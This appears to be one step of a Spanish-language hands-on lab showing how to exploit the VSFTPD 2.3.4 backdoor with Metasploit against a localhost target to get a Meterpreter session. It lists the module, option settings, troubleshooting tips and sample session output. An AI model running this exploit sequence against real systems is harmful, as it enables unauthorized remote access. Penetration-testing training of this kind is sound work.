Obtener acceso inicial
En este paso, obtendrás acceso al sistema objetivo explotando una puerta trasera (backdoor) en el servicio VSFTPD 2.3.4. Esto te proporcionará una sesión de Meterpreter para la post-explotación.
Primero, inicia la consola de Metasploit Framework.
msfconsole -q
Una vez que Metasploit esté en ejecución, selecciona el exploit para la puerta trasera de VSFTPD 2.3.4.
use exploit/unix/ftp/vsftpd_234_backdoor
Ahora, configura las opciones del objetivo y del payload. Dado que el servicio se está ejecutando en la misma máquina, utilizaremos la IP de loopback. El payload predeterminado requiere LHOST y puede fallar con el error "All encoders failed to encode"; configura el codificador para evitar esto:
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
Finalmente, lanza el exploit.
exploit
SOLUCIÓN DE PROBLEMAS: Si ves Msf::OptionValidateError One or more options failed to validate: LHOST, ejecuta set LHOST 127.0.0.1. Si ves All encoders failed to encode, ejecuta set Encoder generic/none. Luego, vuelve a ejecutar exploit.
ADVERTENCIA: El primer intento podría fallar con el mensaje "Unable to connect to backdoor on 6200/TCP. Cooldown?" o "Exploit completed, but no session was created." Si esto sucede, simplemente ejecuta el comando exploit de nuevo; el segundo intento debería tener éxito.
Si tienes éxito, se abrirá una sesión de Meterpreter (sesión 1).
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Ahora tienes una sesión de Meterpreter. Para volver al prompt msf > para el siguiente paso, presiona Ctrl+Z y luego y cuando se te pregunte "¿Background session 1?".